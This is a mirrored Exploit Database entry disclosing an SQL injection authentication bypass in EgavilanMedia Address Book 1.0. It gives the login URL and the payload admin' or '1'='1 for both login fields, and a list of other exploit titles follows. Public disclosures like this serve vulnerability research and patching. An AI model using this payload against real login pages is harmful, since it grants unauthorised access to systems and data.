EgavilanMedia Address Book 1.0 Exploit – SQLi Auth Bypass

Exploit Database
17 阅读

作者： Mayur Parmar

日期： 2020-12-03
类别：
- webapps
平台：
- multiple
来源：https://www.exploit-db.com/exploits/49182/

# Exploit Title: EgavilanMedia Address Book 1.0 Exploit - SQLi Auth Bypass
# Date: 02-12-2020
# Exploit Author: Mayur Parmar(th3cyb3rc0p)
# Vendor Homepage: http://egavilanmedia.com
# Software Link : http://egavilanmedia.com/egm-address-book/
# Version: 1.0
# Tested on: PopOS

Attack Vector:
An attacker can gain admin panel access using malicious sql injection queries.

Steps to reproduce:
1. Open admin login page using following URl:
-> http://localhost/Address%20Book/login.php

2. Now put below Payload in both the fields( User ID & Password)
Payload: admin' or '1'='1

3. Server accepted our payload and we bypassed cpanel without any
credentials

last Exploits
EgavilanMedia Address Book 1.0 Exploit – SQLi Auth Bypass的更多信息

phpCheckZ 1.1.0 – Blind SQL Injection：
Seagate BlackArmor NAS sg2000-2000.1331 – Cross-Site Request Forgery：
Site2Nite Auto e-Manager – SQL Injection：
Dokeos 2.2 RC2 – ‘index.php?language’ SQL Injection：
WordPress Plugin GigPress 2.3.8 – SQL Injection：
Library Management System 1.0 – Blind Time-Based SQL Injection (Unauthenticated)：
Etano 1.20/1.22 – ‘photo_search.php’ Multiple Cross-Site Scripting Vulnerabilities：
Progress OpenEdge 11.2 – Directory Traversal：